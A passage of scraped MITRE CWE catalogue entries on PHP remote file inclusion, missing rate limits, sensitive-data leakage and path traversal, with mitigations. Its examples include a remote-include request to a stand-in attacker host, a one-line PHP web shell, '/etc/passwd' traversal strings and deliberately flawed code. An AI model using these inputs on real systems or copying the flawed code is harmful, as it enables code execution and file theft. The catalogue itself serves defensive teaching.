updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2010-02-16Improper Check for Exceptional Conditions

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Weakness ID: 98
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.

Extended Description

In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the software will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.

+ Alternate Terms
Remote file include
RFI:

The Remote File Inclusion (RFI) acronym is often used by vulnerability researchers.

Local file inclusion:

This term is frequently used in cases in which remote download is disabled, or when the first part of the filename is not under the attacker's control, which forces use of relative path traversal (CWE-23) attack techniques to access files that may contain previously-injected PHP code, such as web access logs.

+ Time of Introduction
  • Implementation
  • Architecture and Design
+ Applicable Platforms

Languages

PHP: (Often)

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the file except for the content between php specifiers.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Manual Analysis

Manual white-box analysis can be very effective for finding this issue, since there is typically a relatively small number of include or require statements in each program.

Effectiveness: High

Automated Static Analysis

The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.

Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. If the program uses a customized input validation library, then some tools may allow the analyst to create custom signatures to detect usage of those routines.

+ Demonstrative Examples

Example 1

The following code attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.

victim.php

(Bad Code)
Example Language: PHP 
$dir = $_GET['module_name'];
include($dir . "/function.php");

The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the 'module_name' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (example.php) with a 'module_name' of "http://malicious.example.com" by using the following request string:

(Attack)
 
victim.php?module_name=http://malicious.example.com

Upon receiving this request, the code would set 'module_name' to the value "http://malicious.example.com" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains.

For the sake of this example, assume that the malicious version of function.php looks like the following:

(Bad Code)
 
system($_GET['cmd']);

An attacker could now go a step further in our example and provide a request string as follows:

(Attack)
 
victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l

The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the 'cmd' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious command, in this case:

(Attack)
 
/bin/ls -l

Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations.

+ Observed Examples
ReferenceDescription
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.
Modification of assumed-immutable variable in configuration script leads to file inclusion.
PHP file inclusion.
PHP file inclusion.
PHP file inclusion.
PHP local file inclusion.
PHP remote file include.
PHP remote file include.
PHP remote file include.
PHP remote file include.
PHP remote file include.
Directory traversal vulnerability in PHP include statement.
Directory traversal vulnerability in PHP include statement.
PHP file inclusion issue, both remote and local; local include uses ".." and "%00" characters as a manipulation, but many remote file inclusion issues probably have this vector.
chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [R.98.1] provide this capability.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.98.2]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When validating filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.

Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a blacklist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.

Phases: Architecture and Design; Operation

Strategy: Identify and Reduce Attack Surface

Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.

This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Operation; Implementation

Strategy: Environment Hardening

Develop and run your code in the most recent versions of PHP available, preferably PHP 6 or later. Many of the highly risky features in earlier PHP interpreters have been removed, restricted, or disabled by default.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Often, programmers do not protect direct access to files intended only to be included by core programs. These include files may assume that critical variables have already been initialized by the calling program. As a result, the use of register_globals combined with the ability to directly access the include file may allow attackers to conduct file inclusion attacks. This remains an extremely common pattern as of 2009.

Phase: Operation

Strategy: Environment Hardening

Set allow_url_fopen to false, which limits the ability to include files from remote locations.

Effectiveness: High

Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect the code from path traversal attacks (CWE-22), which are frequently successful against the same vulnerable code that allows remote file inclusion.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory632Weaknesses that Affect Files or Directories
Resource-specific Weaknesses (primary)631
ChildOfWeakness ClassWeakness Class706Use of Incorrectly-Resolved Name or Reference
Research Concepts1000
ChildOfCategoryCategory714OWASP Top Ten 2007 Category A3 - Malicious File Execution
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory727OWASP Top Ten 2004 Category A6 - Injection Flaws
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfWeakness ClassWeakness Class829Inclusion of Functionality from Untrusted Control Sphere
Development Concepts (primary)699
Research Concepts (primary)1000
CanPrecedeWeakness ClassWeakness Class94Improper Control of Generation of Code ('Code Injection')
Development Concepts699
Research Concepts1000
PeerOfWeakness ClassWeakness Class216Containment Errors (Container Errors)
Research Concepts1000
CanAlsoBeCompound Element: CompositeCompound Element: Composite426Untrusted Search Path
Research Concepts1000
CanFollowWeakness ClassWeakness Class73External Control of File Name or Path
Research Concepts1000
CanFollowWeakness BaseWeakness Base184Incomplete Blacklist
Research Concepts1000
CanFollowWeakness BaseWeakness Base425Direct Request ('Forced Browsing')
Research Concepts1000
CanFollowWeakness BaseWeakness Base456Missing Initialization of a Variable
Research Concepts1000
CanFollowWeakness VariantWeakness Variant473PHP External Variable Modification
Research Concepts1000
+ Relationship Notes

This is frequently a functional consequence of other weaknesses. It is usually multi-factor with other factors (e.g. MAID), although not all inclusion bugs involve assumed-immutable data. Direct request weaknesses frequently play a role.

Can overlap directory traversal in local inclusion problems.

+ Research Gaps

Under-researched and under-reported. Other interpreted languages with "require" and "include" functionality could also product vulnerable applications, but as of 2007, PHP has been the focus. Any web-accessible language that uses executable file extensions is likely to have this type of issue, such as ASP, since .asp extensions are typically executable. Languages such as Perl are less likely to exhibit these problems because the .pl extension isn't always configured to be executable by the web server.

+ Affected Resources
  • File/Directory
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERPHP File Include
OWASP Top Ten 2007A3CWE More SpecificMalicious File Execution
WASC5Remote File Inclusion
+ References
[R.98.1] [REF-32] OWASP. "Testing for Path Traversal (OWASP-AZ-001)". <http://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)>.
[R.98.2] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[REF-12] Shaun Clowes. "A Study in Scarlet". <http://www.cgisecurity.com/lib/studyinscarlet.txt>.
[REF-13] Stefan Esser. "Suhosin". <http://www.hardened-php.net/suhosin/>.
Johannes Ullrich. "Top 25 Series - Rank 13 - PHP File Inclusion". SANS Software Security Institute. 2010-03-11. <http://blogs.sans.org/appsecstreetfighter/2010/03/11/top-25-series-rank-13-php-file-inclusion/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Relationship_Notes, Research_Gaps, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Relationships
2009-03-10CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Description, Name
2009-12-28CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction
2010-02-16
(Critical)
CWE Content TeamMITREInternal
converted from Compound_Element to Weakness
2010-02-16CWE Content TeamMITREInternal
updated Alternate_Terms, Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Type
2010-06-21CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2013-02-21CWE Content TeamMITREInternal
updated Alternate_Terms, Name, Observed_Examples
2017-01-19CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11PHP File Inclusion
2009-05-27Insufficient Control of Filename for Include/Require Statement in PHP Program (aka 'PHP File Inclusion')
2013-02-21Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

CWE-799: Improper Control of Interaction Frequency

Weakness ID: 799
Abstraction: Class
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.

Extended Description

This can allow the actor to perform actions more frequently than expected. The actor could be a human or an automated process such as a virus or bot. This could be used to cause a denial of service, compromise program logic (such as limiting humans to a single vote), or other consequences. For example, an authentication routine might not limit the number of times an attacker can guess a password. Or, a web site might conduct a poll but only expect humans to vote a maximum of once a day.

+ Alternate Terms
Insufficient anti-automation:

The term "insufficient anti-automation" focuses primarly on non-human actors such as viruses or bots, but the scope of this CWE entry is broader.

Brute force:

Vulnerabilities that can be targeted using brute force attacks are often symptomatic of this weakness.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Availability
Access Control
Other

Technical Impact: DoS: resource consumption (other); Bypass protection mechanism; Other

+ Demonstrative Examples

Example 1

In the following code a username and password is read from a socket and an attempt is made to authenticate the username and password. The code will continuously checked the socket for a username and password until it has been authenticated.

(Bad Code)
Example Languages: C and C++ 
char username[USERNAME_SIZE];
char password[PASSWORD_SIZE];

while (isValidUser == 0) {
if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {
if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {
isValidUser = AuthenticateUser(username, password);
}
}
}
return(SUCCESS);

This code does not place any restriction on the number of authentication attempts made. There should be a limit on the number of authentication attempts made to prevent brute force attacks as in the following example code.

(Good Code)
Example Languages: C and C++ 
int count = 0;
while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) {
if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {
if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {
isValidUser = AuthenticateUser(username, password);
}
}
count++;
}
if (isValidUser) {
return(SUCCESS);
}
else {
return(FAIL);
}
+ Observed Examples
ReferenceDescription
Mail server allows attackers to prevent other users from accessing mail by sending large number of rapid requests.
+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory438Behavioral Problems
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class691Insufficient Control Flow Management
Research Concepts (primary)1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory840Business Logic Errors
Development Concepts699
ParentOfWeakness BaseWeakness Base307Improper Restriction of Excessive Authentication Attempts
Research Concepts1000
ParentOfWeakness BaseWeakness Base837Improper Enforcement of a Single, Unique Action
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
WASC21Insufficient Anti-Automation
+ References
Web Application Security Consortium. "Insufficient Anti-automation". <http://projects.webappsec.org/Insufficient+Anti-automation>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2010-01-15MITREInternal CWE Team
New entry to handle anti-automation as identified in WASC.
Modifications
Modification DateModifierOrganizationSource
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-03-29CWE Content TeamMITREInternal
updated Observed_Examples, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences

CWE-212: Improper Cross-boundary Removal of Sensitive Data

Weakness ID: 212
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software uses a resource that contains sensitive data, but it does not properly remove that data before it stores, transfers, or shares the resource with actors in another control sphere.

Extended Description

Resources that may contain sensitive data include documents, packets, messages, databases, etc. While this data may be useful to an individual user or small set of users who share the resource, it may need to be removed before the resource can be shared outside of the trusted group. The process of removal is sometimes called cleansing or scrubbing.

For example, software that is used for editing documents might not remove sensitive data such as reviewer comments or the local pathname where the document is stored. Or, a proxy might not remove an internal IP address from headers before making an outgoing request to an Internet site.

+ Terminology Notes

The terms "cleansing" and "scrubbing" have multiple uses within computing. In information security, these are used for the removal of sensitive data, but they are also used for the modification of incoming/outgoing data so that it conforms to specifications.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read files or directories; Read application data

Sensitive data may be exposed to an unauthorized actor in another control sphere. This may have a wide range of secondary consequences which will depend on what data is exposed. One possibility is the exposure of system data allowing an attacker to craft a specific, more effective attack.

+ Demonstrative Examples

Example 1

This code either generates a public HTML user information page or a JSON response containing the same user information.

(Bad Code)
Example Language: PHP 
// API flag, output JSON if set
$json = $_GET['json']
$username = $_GET['user']
if(!$json)
{
$record = getUserRecord($username);
foreach($record as $fieldName => $fieldValue)
{
if($fieldName == "email_address") {
// skip displaying user emails
continue;
}
else{
writeToHtmlPage($fieldName,$fieldValue);
}
}
}
else
{
$record = getUserRecord($username);
echo json_encode($record);
}

The programmer is careful to not display the user's e-mail address when displaying the public HTML page. However, the e-mail address is not removed from the JSON response, exposing the user's e-mail address.

+ Observed Examples
ReferenceDescription
Some image editors modify a JPEG image, but the original EXIF thumbnail image is left intact within the JPEG. (Also an interaction error).
NAT feature in firewall leaks internal IP addresses in ICMP error messages.
+ Potential Mitigations

Phase: Requirements

Clearly specify which information should be regarded as private or sensitive, and require that the product offers functionality that allows the user to cleanse the sensitive information from the resource before it is published or exported to other parties.

Phase: Architecture and Design

Strategy: Separation of Privilege

Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.

Ensure that appropriate compartmentalization is built into the system design and that the compartmentalization serves to allow for and further reinforce privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide when it is appropriate to use and to drop system privileges.

Phase: Implementation

Strategy: Identify and Reduce Attack Surface

Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.

Effectiveness: Defense in Depth

This makes it easier to spot places in the code where data is being used that is unencrypted.

Phase: Implementation

Avoid errors related to improper resource shutdown or release (CWE-404), which may leave the sensitive data within the resource if it is in an incomplete state.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class200Information Exposure
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfWeakness ClassWeakness Class669Incorrect Resource Transfer Between Spheres
Research Concepts1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory8672011 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanAlsoBeWeakness BaseWeakness Base226Sensitive Information Uncleared Before Release
Research Concepts1000
+ Relationship Notes

This entry is intended to be different from resultant information leaks, including those that occur from improper buffer initialization and reuse, improper encryption, interaction errors, and multiple interpretation errors. This entry could be regarded as a privacy leak, depending on the type of information that is leaked.

There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000).

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERCross-Boundary Cleansing Infoleak
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes, Relationship_Notes
2009-12-28CWE Content TeamMITREInternal
updated Name
2010-02-16CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships, Terminology_Notes
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-12-28Cross-boundary Cleansing Information Leak
2010-02-16Improper Cross-boundary Cleansing

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Weakness ID: 22
Abstraction: Class
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Extended Description

Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as "/usr/local/bin", which may also be useful in accessing unexpected files. This is referred to as absolute path traversal.

In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack. For example, the software may add ".txt" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction.

+ Alternate Terms
Directory traversal
Path traversal:

"Path traversal" is preferred over "directory traversal," but both terms are attack-focused.

+ Terminology Notes

Like other weaknesses, terminology is often based on the types of manipulations used, instead of the underlying weaknesses. Some people use "directory traversal" only to refer to the injection of ".." and equivalent sequences whose specific meaning is to traverse directories.

Other variants like "absolute pathname" and "drive letter" have the *effect* of directory traversal, but some people may not call it such, since it doesn't involve ".." or equivalent.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.

Integrity

Technical Impact: Modify files or directories

The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.

Confidentiality

Technical Impact: Read files or directories

The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.

Availability

Technical Impact: DoS: crash / exit / restart

The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Automated Static Analysis

Automated techniques can find areas where path traversal weaknesses exist. However, tuning or customization may be required to remove or de-prioritize path-traversal problems that are only exploitable by the software's administrator - or other privileged users - and thus potentially valid behavior or, at worst, a bug instead of a vulnerability.

Effectiveness: High

Manual Static Analysis

Manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all file access operations can be assessed within limited time constraints.

Effectiveness: High

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

Cost effective for partial coverage:

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR High

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR High

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

The following code could be for a social networking application in which each user's profile information is stored in a separate file. All files are stored in a single directory.

(Bad Code)
Example Language: Perl 
my $dataPath = "/users/cwe/profiles";
my $username = param("user");
my $profilePath = $dataPath . "/" . $username;

open(my $fh, "<$profilePath") || ExitError("profile read error: $profilePath");
print "<ul>\n";
while (<$fh>) {
print "<li>$_</li>\n";
}
print "</ul>\n";

While the programmer intends to access files such as "/users/cwe/profiles/alice" or "/users/cwe/profiles/bob", there is no verification of the incoming user parameter. An attacker could provide a string such as:

(Attack)
 
../../../etc/passwd

The program would generate a profile pathname like this:

(Result)
 
/users/cwe/profiles/../../../etc/passwd

When the file is opened, the operating system resolves the "../" during path canonicalization and actually accesses this file:

(Result)
 
/etc/passwd

As a result, the attacker could read the entire text of the password file.

Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined.

Example 2

In the example below, the path to a dictionary file is read from a system property and used to initialize a File object.

(Bad Code)
Example Language: Java 
String filename = System.getProperty("com.domain.application.dictionaryFile");
File dictionaryFile = new File(filename);

However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory.

Example 3

The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.

(Bad Code)
Example Language: Perl 
my $Username = GetUntrustedInput();
$Username =~ s/\.\.\///;
my $filename = "/home/user/" . $Username;
ReadAndSendFile($filename);

Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as:

(Attack)
 
../../../etc/passwd

will have the first "../" stripped, resulting in:

(Result)
 
../../etc/passwd

This value is then concatenated with the /home/user/ directory:

(Result)
 
/home/user/../../etc/passwd

which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23).

Example 4

The following code attempts to validate a given input path by checking it against a whitelist and once validated delete the given file. In this specific case, the path is considered valid if it starts with the string "/safe_dir/".

(Bad Code)
Example Language: Java 
String path = getInputPath();
if (path.startsWith("/safe_dir/"))
{
File f = new File(path);
f.delete()
}

An attacker could provide an input such as this:

(Attack)
 
/safe_dir/../important.dat

The software assumes that the path is valid because it starts with the "/safe_path/" sequence, but the "../" sequence will cause the program to delete the important.dat file in the parent directory

Example 5

